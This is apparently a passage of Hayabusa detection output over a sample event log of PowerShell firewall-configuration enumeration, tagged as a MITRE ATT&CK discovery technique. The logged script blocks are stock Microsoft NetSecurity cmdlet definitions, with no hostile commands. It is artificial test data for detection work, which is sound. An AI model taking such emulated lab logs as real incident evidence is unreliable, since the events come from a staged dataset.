DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown 
= $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase1AuthSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletizati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"on_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
